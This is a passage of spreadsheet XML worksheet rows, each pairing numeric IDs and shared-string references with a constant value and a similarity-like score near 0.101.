    <row r="31837" ht="15.75" customHeight="1">
      <c r="A31837" s="1">
        <v>3239.0</v>
      </c>
      <c r="B31837" s="2">
        <v>3.7360627E7</v>
      </c>
      <c r="C31837" s="2" t="s">
        <v>30624</v>
      </c>
      <c r="D31837" s="2">
        <v>1.0</v>
      </c>
      <c r="E31837" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31837" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31838" ht="15.75" customHeight="1">
      <c r="A31838" s="1">
        <v>8652.0</v>
      </c>
      <c r="B31838" s="2">
        <v>5.4353502E7</v>
      </c>
      <c r="C31838" s="2" t="s">
        <v>30625</v>
      </c>
      <c r="D31838" s="2">
        <v>1.0</v>
      </c>
      <c r="E31838" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31838" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31839" ht="15.75" customHeight="1">
      <c r="A31839" s="1">
        <v>9582.0</v>
      </c>
      <c r="B31839" s="2">
        <v>5.6089238E7</v>
      </c>
      <c r="C31839" s="2" t="s">
        <v>30550</v>
      </c>
      <c r="D31839" s="2">
        <v>1.0</v>
      </c>
      <c r="E31839" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31839" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31840" ht="15.75" customHeight="1">
      <c r="A31840" s="1">
        <v>18206.0</v>
      </c>
      <c r="B31840" s="2">
        <v>5.2062865E7</v>
      </c>
      <c r="C31840" s="2" t="s">
        <v>30626</v>
      </c>
      <c r="D31840" s="2">
        <v>1.0</v>
      </c>
      <c r="E31840" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31840" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31841" ht="15.75" customHeight="1">
      <c r="A31841" s="1">
        <v>32397.0</v>
      </c>
      <c r="B31841" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C31841" s="2" t="s">
        <v>30627</v>
      </c>
      <c r="D31841" s="2">
        <v>1.0</v>
      </c>
      <c r="E31841" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31841" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31842" ht="15.75" customHeight="1">
      <c r="A31842" s="1">
        <v>2860.0</v>
      </c>
      <c r="B31842" s="2">
        <v>3.5539524E7</v>
      </c>
      <c r="C31842" s="2" t="s">
        <v>30628</v>
      </c>
      <c r="D31842" s="2">
        <v>1.0</v>
      </c>
      <c r="E31842" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31842" s="2">
        <v>0.1014109347442681</v>
      </c>
    </row>
    <row r="31843" ht="15.75" customHeight="1">
      <c r="A31843" s="1">
        <v>16297.0</v>
      </c>
      <c r="B31843" s="2">
        <v>4.5896407E7</v>
      </c>
      <c r="C31843" s="2" t="s">
        <v>30629</v>
      </c>
      <c r="D31843" s="2">
        <v>1.0</v>
      </c>
      <c r="E31843" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31843" s="2">
        <v>0.1014109347442681</v>
      </c>
    </row>
    <row r="31844" ht="15.75" customHeight="1">
      <c r="A31844" s="1">
        <v>178.0</v>
      </c>
      <c r="B31844" s="2">
        <v>1.4113174E7</v>
      </c>
      <c r="C31844" s="2" t="s">
        <v>30630</v>
      </c>
      <c r="D31844" s="2">
        <v>1.0</v>
      </c>
      <c r="E31844" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31844" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31845" ht="15.75" customHeight="1">
      <c r="A31845" s="1">
        <v>181.0</v>
      </c>
      <c r="B31845" s="2">
        <v>1.4178553E7</v>
      </c>
      <c r="C31845" s="2" t="s">
        <v>30631</v>
      </c>
      <c r="D31845" s="2">
        <v>1.0</v>
      </c>
      <c r="E31845" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31845" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31846" ht="15.75" customHeight="1">
      <c r="A31846" s="1">
        <v>560.0</v>
      </c>
      <c r="B31846" s="2">
        <v>1.8926979E7</v>
      </c>
      <c r="C31846" s="2" t="s">
        <v>30632</v>
      </c>
      <c r="D31846" s="2">
        <v>1.0</v>
      </c>
      <c r="E31846" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31846" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31847" ht="15.75" customHeight="1">
      <c r="A31847" s="1">
        <v>659.0</v>
      </c>
      <c r="B31847" s="2">
        <v>2.007961E7</v>
      </c>
      <c r="C31847" s="2" t="s">
        <v>30633</v>
      </c>
      <c r="D31847" s="2">
        <v>1.0</v>
      </c>
      <c r="E31847" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31847" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31848" ht="15.75" customHeight="1">
      <c r="A31848" s="1">
        <v>739.0</v>
      </c>
      <c r="B31848" s="2">
        <v>2.083519E7</v>
      </c>
      <c r="C31848" s="2" t="s">
        <v>30634</v>
      </c>
      <c r="D31848" s="2">
        <v>1.0</v>
      </c>
      <c r="E31848" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31848" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31849" ht="15.75" customHeight="1">
      <c r="A31849" s="1">
        <v>822.0</v>
      </c>
      <c r="B31849" s="2">
        <v>2.1513988E7</v>
      </c>
      <c r="C31849" s="2" t="s">
        <v>30635</v>
      </c>
      <c r="D31849" s="2">
        <v>1.0</v>
      </c>
      <c r="E31849" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31849" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31850" ht="15.75" customHeight="1">
      <c r="A31850" s="1">
        <v>873.0</v>
      </c>
      <c r="B31850" s="2">
        <v>2.1886871E7</v>
      </c>
      <c r="C31850" s="2" t="s">
        <v>30636</v>
      </c>
      <c r="D31850" s="2">
        <v>1.0</v>
      </c>
      <c r="E31850" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31850" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31851" ht="15.75" customHeight="1">
      <c r="A31851" s="1">
        <v>1069.0</v>
      </c>
      <c r="B31851" s="2">
        <v>2.3538522E7</v>
      </c>
      <c r="C31851" s="2" t="s">
        <v>30637</v>
      </c>
      <c r="D31851" s="2">
        <v>1.0</v>
      </c>
      <c r="E31851" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31851" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31852" ht="15.75" customHeight="1">
      <c r="A31852" s="1">
        <v>1078.0</v>
      </c>
      <c r="B31852" s="2">
        <v>2.361137E7</v>
      </c>
      <c r="C31852" s="2" t="s">
        <v>30638</v>
      </c>
      <c r="D31852" s="2">
        <v>1.0</v>
      </c>
      <c r="E31852" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31852" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31853" ht="15.75" customHeight="1">
      <c r="A31853" s="1">
        <v>1106.0</v>
      </c>
      <c r="B31853" s="2">
        <v>2.3991249E7</v>
      </c>
      <c r="C31853" s="2" t="s">
        <v>30639</v>
      </c>
      <c r="D31853" s="2">
        <v>1.0</v>
      </c>
      <c r="E31853" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31853" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31854" ht="15.75" customHeight="1">
      <c r="A31854" s="1">
        <v>1142.0</v>
      </c>
      <c r="B31854" s="2">
        <v>2.4289022E7</v>
      </c>
      <c r="C31854" s="2" t="s">
        <v>30640</v>
      </c>
      <c r="D31854" s="2">
        <v>1.0</v>
      </c>
      <c r="E31854" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31854" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31855" ht="15.75" customHeight="1">
      <c r="A31855" s="1">
        <v>1187.0</v>
      </c>
      <c r="B31855" s="2">
        <v>2.4677182E7</v>
      </c>
      <c r="C31855" s="2" t="s">
        <v>30641</v>
      </c>
      <c r="D31855" s="2">
        <v>1.0</v>
      </c>
      <c r="E31855" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31855" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31856" ht="15.75" customHeight="1">
      <c r="A31856" s="1">
        <v>1205.0</v>
      </c>
      <c r="B31856" s="2">
        <v>2.4834189E7</v>
      </c>
      <c r="C31856" s="2" t="s">
        <v>30642</v>
      </c>
      <c r="D31856" s="2">
        <v>1.0</v>
      </c>
      <c r="E31856" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31856" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31857" ht="15.75" customHeight="1">
      <c r="A31857" s="1">
        <v>1574.0</v>
      </c>
      <c r="B31857" s="2">
        <v>2.7708191E7</v>
      </c>
      <c r="C31857" s="2" t="s">
        <v>30643</v>
      </c>
      <c r="D31857" s="2">
        <v>1.0</v>
      </c>
      <c r="E31857" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31857" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31858" ht="15.75" customHeight="1">
      <c r="A31858" s="1">
        <v>1597.0</v>
      </c>
      <c r="B31858" s="2">
        <v>2.7770458E7</v>
      </c>
      <c r="C31858" s="2" t="s">
        <v>30644</v>
      </c>
      <c r="D31858" s="2">
        <v>1.0</v>
      </c>
      <c r="E31858" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31858" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31859" ht="15.75" customHeight="1">
      <c r="A31859" s="1">
        <v>1695.0</v>
      </c>
      <c r="B31859" s="2">
        <v>2.8511842E7</v>
      </c>
      <c r="C31859" s="2" t="s">
        <v>30645</v>
      </c>
      <c r="D31859" s="2">
        <v>1.0</v>
      </c>
      <c r="E31859" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31859" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31860" ht="15.75" customHeight="1">
      <c r="A31860" s="1">
        <v>1827.0</v>
      </c>
      <c r="B31860" s="2">
        <v>2.9328388E7</v>
      </c>
      <c r="C31860" s="2" t="s">
        <v>30646</v>
      </c>
      <c r="D31860" s="2">
        <v>1.0</v>
      </c>
      <c r="E31860" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31860" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31861" ht="15.75" customHeight="1">
      <c r="A31861" s="1">
        <v>1981.0</v>
      </c>
      <c r="B31861" s="2">
        <v>3.0443999E7</v>
      </c>
      <c r="C31861" s="2" t="s">
        <v>30647</v>
      </c>
      <c r="D31861" s="2">
        <v>1.0</v>
      </c>
      <c r="E31861" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31861" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31862" ht="15.75" customHeight="1">
      <c r="A31862" s="1">
        <v>1988.0</v>
      </c>
      <c r="B31862" s="2">
        <v>3.0506098E7</v>
      </c>
      <c r="C31862" s="2" t="s">
        <v>30648</v>
      </c>
      <c r="D31862" s="2">
        <v>1.0</v>
      </c>
      <c r="E31862" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31862" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31863" ht="15.75" customHeight="1">
      <c r="A31863" s="1">
        <v>2062.0</v>
      </c>
      <c r="B31863" s="2">
        <v>3.1040595E7</v>
      </c>
      <c r="C31863" s="2" t="s">
        <v>30649</v>
      </c>
      <c r="D31863" s="2">
        <v>1.0</v>
      </c>
      <c r="E31863" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31863" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31864" ht="15.75" customHeight="1">
      <c r="A31864" s="1">
        <v>2120.0</v>
      </c>
      <c r="B31864" s="2">
        <v>3.1383411E7</v>
      </c>
      <c r="C31864" s="2" t="s">
        <v>30650</v>
      </c>
      <c r="D31864" s="2">
        <v>1.0</v>
      </c>
      <c r="E31864" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31864" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31865" ht="15.75" customHeight="1">
      <c r="A31865" s="1">
        <v>2269.0</v>
      </c>
      <c r="B31865" s="2">
        <v>3.251117E7</v>
      </c>
      <c r="C31865" s="2" t="s">
        <v>30651</v>
      </c>
      <c r="D31865" s="2">
        <v>1.0</v>
      </c>
      <c r="E31865" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31865" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31866" ht="15.75" customHeight="1">
      <c r="A31866" s="1">
        <v>2463.0</v>
      </c>
      <c r="B31866" s="2">
        <v>3.3792407E7</v>
      </c>
      <c r="C31866" s="2" t="s">
        <v>30652</v>
      </c>
      <c r="D31866" s="2">
        <v>1.0</v>
      </c>
      <c r="E31866" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31866" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31867" ht="15.75" customHeight="1">
      <c r="A31867" s="1">
        <v>2542.0</v>
      </c>
      <c r="B31867" s="2">
        <v>3.4115672E7</v>
      </c>
      <c r="C31867" s="2" t="s">
        <v>30653</v>
      </c>
      <c r="D31867" s="2">
        <v>1.0</v>
      </c>
      <c r="E31867" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31867" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31868" ht="15.75" customHeight="1">
      <c r="A31868" s="1">
        <v>2692.0</v>
      </c>
      <c r="B31868" s="2">
        <v>3.4826388E7</v>
      </c>
      <c r="C31868" s="2" t="s">
        <v>30654</v>
      </c>
      <c r="D31868" s="2">
        <v>1.0</v>
      </c>
      <c r="E31868" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31868" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31869" ht="15.75" customHeight="1">
      <c r="A31869" s="1">
        <v>2713.0</v>
      </c>
      <c r="B31869" s="2">
        <v>3.4885459E7</v>
      </c>
      <c r="C31869" s="2" t="s">
        <v>30655</v>
      </c>
      <c r="D31869" s="2">
        <v>1.0</v>
      </c>
      <c r="E31869" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31869" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31870" ht="15.75" customHeight="1">
      <c r="A31870" s="1">
        <v>3154.0</v>
      </c>
      <c r="B31870" s="2">
        <v>3.6995865E7</v>
      </c>
      <c r="C31870" s="2" t="s">
        <v>30656</v>
      </c>
      <c r="D31870" s="2">
        <v>1.0</v>
      </c>
      <c r="E31870" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31870" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31871" ht="15.75" customHeight="1">
      <c r="A31871" s="1">
        <v>3259.0</v>
      </c>
      <c r="B31871" s="2">
        <v>3.7427937E7</v>
      </c>
      <c r="C31871" s="2" t="s">
        <v>30657</v>
      </c>
      <c r="D31871" s="2">
        <v>1.0</v>
      </c>
      <c r="E31871" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31871" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31872" ht="15.75" customHeight="1">
      <c r="A31872" s="1">
        <v>3283.0</v>
      </c>
      <c r="B31872" s="2">
        <v>3.7500693E7</v>
      </c>
      <c r="C31872" s="2" t="s">
        <v>30658</v>
      </c>
      <c r="D31872" s="2">
        <v>1.0</v>
      </c>
      <c r="E31872" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31872" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31873" ht="15.75" customHeight="1">
      <c r="A31873" s="1">
        <v>3351.0</v>
      </c>
      <c r="B31873" s="2">
        <v>3.7765174E7</v>
      </c>
      <c r="C31873" s="2" t="s">
        <v>30659</v>
      </c>
      <c r="D31873" s="2">
        <v>1.0</v>
      </c>
      <c r="E31873" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31873" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31874" ht="15.75" customHeight="1">
      <c r="A31874" s="1">
        <v>3859.0</v>
      </c>
      <c r="B31874" s="2">
        <v>4.0303933E7</v>
      </c>
      <c r="C31874" s="2" t="s">
        <v>30660</v>
      </c>
      <c r="D31874" s="2">
        <v>1.0</v>
      </c>
      <c r="E31874" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31874" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31875" ht="15.75" customHeight="1">
      <c r="A31875" s="1">
        <v>3889.0</v>
      </c>
      <c r="B31875" s="2">
        <v>4.0398717E7</v>
      </c>
      <c r="C31875" s="2" t="s">
        <v>30661</v>
      </c>
      <c r="D31875" s="2">
        <v>1.0</v>
      </c>
      <c r="E31875" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31875" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31876" ht="15.75" customHeight="1">
      <c r="A31876" s="1">
        <v>3911.0</v>
      </c>
      <c r="B31876" s="2">
        <v>4.0514178E7</v>
      </c>
      <c r="C31876" s="2" t="s">
        <v>30662</v>
      </c>
      <c r="D31876" s="2">
        <v>1.0</v>
      </c>
      <c r="E31876" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31876" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31877" ht="15.75" customHeight="1">
      <c r="A31877" s="1">
        <v>4029.0</v>
      </c>
      <c r="B31877" s="2">
        <v>4.100596E7</v>
      </c>
      <c r="C31877" s="2" t="s">
        <v>30663</v>
      </c>
      <c r="D31877" s="2">
        <v>1.0</v>
      </c>
      <c r="E31877" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31877" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31878" ht="15.75" customHeight="1">
      <c r="A31878" s="1">
        <v>4072.0</v>
      </c>
      <c r="B31878" s="2">
        <v>4.1175995E7</v>
      </c>
      <c r="C31878" s="2" t="s">
        <v>30664</v>
      </c>
      <c r="D31878" s="2">
        <v>1.0</v>
      </c>
      <c r="E31878" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31878" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31879" ht="15.75" customHeight="1">
      <c r="A31879" s="1">
        <v>4225.0</v>
      </c>
      <c r="B31879" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C31879" s="2" t="s">
        <v>30665</v>
      </c>
      <c r="D31879" s="2">
        <v>1.0</v>
      </c>
      <c r="E31879" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31879" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31880" ht="15.75" customHeight="1">
      <c r="A31880" s="1">
        <v>4233.0</v>
      </c>
      <c r="B31880" s="2">
        <v>4.1771067E7</v>
      </c>
      <c r="C31880" s="2" t="s">
        <v>30666</v>
      </c>
      <c r="D31880" s="2">
        <v>1.0</v>
      </c>
      <c r="E31880" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31880" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31881" ht="15.75" customHeight="1">
      <c r="A31881" s="1">
        <v>4388.0</v>
      </c>
      <c r="B31881" s="2">
        <v>4.2211264E7</v>
      </c>
      <c r="C31881" s="2" t="s">
        <v>30667</v>
      </c>
      <c r="D31881" s="2">
        <v>1.0</v>
      </c>
      <c r="E31881" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31881" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31882" ht="15.75" customHeight="1">
      <c r="A31882" s="1">
        <v>4537.0</v>
      </c>
      <c r="B31882" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C31882" s="2" t="s">
        <v>30668</v>
      </c>
      <c r="D31882" s="2">
        <v>1.0</v>
      </c>
      <c r="E31882" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31882" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31883" ht="15.75" customHeight="1">
      <c r="A31883" s="1">
        <v>4574.0</v>
      </c>
      <c r="B31883" s="2">
        <v>4.2765281E7</v>
      </c>
      <c r="C31883" s="2" t="s">
        <v>30669</v>
      </c>
      <c r="D31883" s="2">
        <v>1.0</v>
      </c>
      <c r="E31883" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31883" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31884" ht="15.75" customHeight="1">
      <c r="A31884" s="1">
        <v>4575.0</v>
      </c>
      <c r="B31884" s="2">
        <v>4.2766646E7</v>
      </c>
      <c r="C31884" s="2" t="s">
        <v>30670</v>
      </c>
      <c r="D31884" s="2">
        <v>1.0</v>
      </c>
      <c r="E31884" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31884" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31885" ht="15.75" customHeight="1">
      <c r="A31885" s="1">
        <v>4613.0</v>
      </c>
      <c r="B31885" s="2">
        <v>4.2911449E7</v>
      </c>
      <c r="C31885" s="2" t="s">
        <v>30671</v>
      </c>
      <c r="D31885" s="2">
        <v>1.0</v>
      </c>
      <c r="E31885" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31885" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31886" ht="15.75" customHeight="1">
      <c r="A31886" s="1">
        <v>4829.0</v>
      </c>
      <c r="B31886" s="2">
        <v>4.3655818E7</v>
      </c>
      <c r="C31886" s="2" t="s">
        <v>30672</v>
      </c>
      <c r="D31886" s="2">
        <v>1.0</v>
      </c>
      <c r="E31886" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31886" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31887" ht="15.75" customHeight="1">
      <c r="A31887" s="1">
        <v>4866.0</v>
      </c>
      <c r="B31887" s="2">
        <v>4.3824217E7</v>
      </c>
      <c r="C31887" s="2" t="s">
        <v>30673</v>
      </c>
      <c r="D31887" s="2">
        <v>1.0</v>
      </c>
      <c r="E31887" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31887" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31888" ht="15.75" customHeight="1">
      <c r="A31888" s="1">
        <v>4926.0</v>
      </c>
      <c r="B31888" s="2">
        <v>4.3984522E7</v>
      </c>
      <c r="C31888" s="2" t="s">
        <v>30674</v>
      </c>
      <c r="D31888" s="2">
        <v>1.0</v>
      </c>
      <c r="E31888" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31888" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31889" ht="15.75" customHeight="1">
      <c r="A31889" s="1">
        <v>5526.0</v>
      </c>
      <c r="B31889" s="2">
        <v>4.5876199E7</v>
      </c>
      <c r="C31889" s="2" t="s">
        <v>30675</v>
      </c>
      <c r="D31889" s="2">
        <v>1.0</v>
      </c>
      <c r="E31889" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31889" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31890" ht="15.75" customHeight="1">
      <c r="A31890" s="1">
        <v>5552.0</v>
      </c>
      <c r="B31890" s="2">
        <v>4.5947352E7</v>
      </c>
      <c r="C31890" s="2" t="s">
        <v>30676</v>
      </c>
      <c r="D31890" s="2">
        <v>1.0</v>
      </c>
      <c r="E31890" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31890" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31891" ht="15.75" customHeight="1">
      <c r="A31891" s="1">
        <v>5604.0</v>
      </c>
      <c r="B31891" s="2">
        <v>4.6138142E7</v>
      </c>
      <c r="C31891" s="2" t="s">
        <v>30677</v>
      </c>
      <c r="D31891" s="2">
        <v>1.0</v>
      </c>
      <c r="E31891" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31891" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31892" ht="15.75" customHeight="1">
      <c r="A31892" s="1">
        <v>5605.0</v>
      </c>
      <c r="B31892" s="2">
        <v>4.6141954E7</v>
      </c>
      <c r="C31892" s="2" t="s">
        <v>30678</v>
      </c>
      <c r="D31892" s="2">
        <v>1.0</v>
      </c>
      <c r="E31892" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31892" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31893" ht="15.75" customHeight="1">
      <c r="A31893" s="1">
        <v>5652.0</v>
      </c>
      <c r="B31893" s="2">
        <v>4.6286945E7</v>
      </c>
      <c r="C31893" s="2" t="s">
        <v>30679</v>
      </c>
      <c r="D31893" s="2">
        <v>1.0</v>
      </c>
      <c r="E31893" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31893" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31894" ht="15.75" customHeight="1">
      <c r="A31894" s="1">
        <v>5931.0</v>
      </c>
      <c r="B31894" s="2">
        <v>4.725177E7</v>
      </c>
      <c r="C31894" s="2" t="s">
        <v>30680</v>
      </c>
      <c r="D31894" s="2">
        <v>1.0</v>
      </c>
      <c r="E31894" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31894" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31895" ht="15.75" customHeight="1">
      <c r="A31895" s="1">
        <v>6086.0</v>
      </c>
      <c r="B31895" s="2">
        <v>4.7682541E7</v>
      </c>
      <c r="C31895" s="2" t="s">
        <v>30681</v>
      </c>
      <c r="D31895" s="2">
        <v>1.0</v>
      </c>
      <c r="E31895" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31895" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31896" ht="15.75" customHeight="1">
      <c r="A31896" s="1">
        <v>6304.0</v>
      </c>
      <c r="B31896" s="2">
        <v>4.8235012E7</v>
      </c>
      <c r="C31896" s="2" t="s">
        <v>30682</v>
      </c>
      <c r="D31896" s="2">
        <v>1.0</v>
      </c>
      <c r="E31896" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31896" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31897" ht="15.75" customHeight="1">
      <c r="A31897" s="1">
        <v>6416.0</v>
      </c>
      <c r="B31897" s="2">
        <v>4.8541108E7</v>
      </c>
      <c r="C31897" s="2" t="s">
        <v>30683</v>
      </c>
      <c r="D31897" s="2">
        <v>1.0</v>
      </c>
      <c r="E31897" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31897" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31898" ht="15.75" customHeight="1">
      <c r="A31898" s="1">
        <v>6477.0</v>
      </c>
      <c r="B31898" s="2">
        <v>4.866475E7</v>
      </c>
      <c r="C31898" s="2" t="s">
        <v>30684</v>
      </c>
      <c r="D31898" s="2">
        <v>1.0</v>
      </c>
      <c r="E31898" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31898" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31899" ht="15.75" customHeight="1">
      <c r="A31899" s="1">
        <v>6565.0</v>
      </c>
      <c r="B31899" s="2">
        <v>4.8896858E7</v>
      </c>
      <c r="C31899" s="2" t="s">
        <v>30685</v>
      </c>
      <c r="D31899" s="2">
        <v>1.0</v>
      </c>
      <c r="E31899" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31899" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31900" ht="15.75" customHeight="1">
      <c r="A31900" s="1">
        <v>6712.0</v>
      </c>
      <c r="B31900" s="2">
        <v>4.9250691E7</v>
      </c>
      <c r="C31900" s="2" t="s">
        <v>30686</v>
      </c>
      <c r="D31900" s="2">
        <v>1.0</v>
      </c>
      <c r="E31900" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31900" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31901" ht="15.75" customHeight="1">
      <c r="A31901" s="1">
        <v>6881.0</v>
      </c>
      <c r="B31901" s="2">
        <v>4.9723554E7</v>
      </c>
      <c r="C31901" s="2" t="s">
        <v>30687</v>
      </c>
      <c r="D31901" s="2">
        <v>1.0</v>
      </c>
      <c r="E31901" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31901" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31902" ht="15.75" customHeight="1">
      <c r="A31902" s="1">
        <v>7225.0</v>
      </c>
      <c r="B31902" s="2">
        <v>5.0655546E7</v>
      </c>
      <c r="C31902" s="2" t="s">
        <v>30688</v>
      </c>
      <c r="D31902" s="2">
        <v>1.0</v>
      </c>
      <c r="E31902" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31902" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="31903" ht="15.75" customHeight="1">
      <c r="A31903" s="1">
        <v>7315.0</v>
      </c>
      <c r="B31903" s="2">
        <v>5.0871088E7</v>
      </c>
      <c r="C31903" s="2" t="s">
        <v>30689</v>
      </c>
      <c r="D31903" s="2">
        <v>1.0</v>
      </c>
      <c r="E31903" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31903" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
